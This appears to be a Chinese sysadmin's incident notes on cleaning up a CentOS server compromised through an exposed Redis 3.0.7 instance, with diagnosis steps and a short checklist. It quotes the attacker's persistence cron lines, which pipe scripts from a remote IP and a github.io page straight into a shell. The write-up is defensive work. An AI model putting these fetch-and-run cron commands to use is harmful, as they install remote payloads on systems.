今天早上來,網站打不開。通過xshell打不開終端,很久才打開。發現內存占用率高達95%,loadavg 15 16 16
現狀:
- 負載太高 15 15 16
- 網站打不開,shell進去緩慢,執行明令響應太慢
分析:
記得緩存用的是reids3.07(有漏洞,對IP過濾不嚴謹導致的),需要綁定IP即可
解決:
redis.conf
bind 127.0.0.1 10.104.0.10
./redis-server ../redis.conf &
./redis-cli
flushdb ###清空緩存
郵件
/var/spool/mail/root
From: root@VM_178_10_centos.localdomain (Cron Daemon)
To: root@VM_178_10_centos.localdomain
Subject: Cron <root@VM_178_10_centos> /usr/bin/curl -fsSL http://137.59.18.134:7777/setup.sh | sh
可以確定主機被入侵了!在郵件中發現每隔1min執行一次下載腳本的動作
定時任務
crontab -l ###發現定時任務不正常,不停地刷亂碼
/var/spool/cron/root
REDIS0006� ###redis漏洞,入侵記錄
/var/spool/cron/crontabs/root
REDIS0006 .....
*/2 * * * * curl https://zcsgogogogo.github.io/1|/bin/sh ###痕跡
cpu/mem使用率
free -m
[root@centos ~]# free -m
total used free shared buffers cached
Mem: 3830 3361 469 0 207 1070
-/+ buffers/cache: 2084 1746
Swap: 0 0 0
cat /proc/loadavg
[root@centos ~]# cat /proc/loadavg
0.00 0.00 0.00 1/587 22099 ###在入侵之前都是15+的
top
查看占用CPU最高的程序
xxx5555
kill -9 pid
追蹤到/tmp目錄
###后門、病毒文件,
xxx555
redif
wgsp
逐一在進程中查找,殺掉 kill -9 pid
rm -rf /tmp/* ###清空臨時目錄文件
查殺:
再次crontab -l ,仍然發現再繼續刷亂碼,說明問題沒有根本性解決
ps -ef | grep sh
發現 .sshd可以進程 /usr/bin/.sshd ### 一般bin目錄下沒有.xxx的可執行文件
kill -9 pid
crontab -r
OK,問題解決了
load average: 0.00, 0.00, 0.00 ###降下來了
總結-Linux入侵后的檢測修復
- 查看占用CPU和內存最高的進程
- 查看定時任務crontab
- 查看mail和日志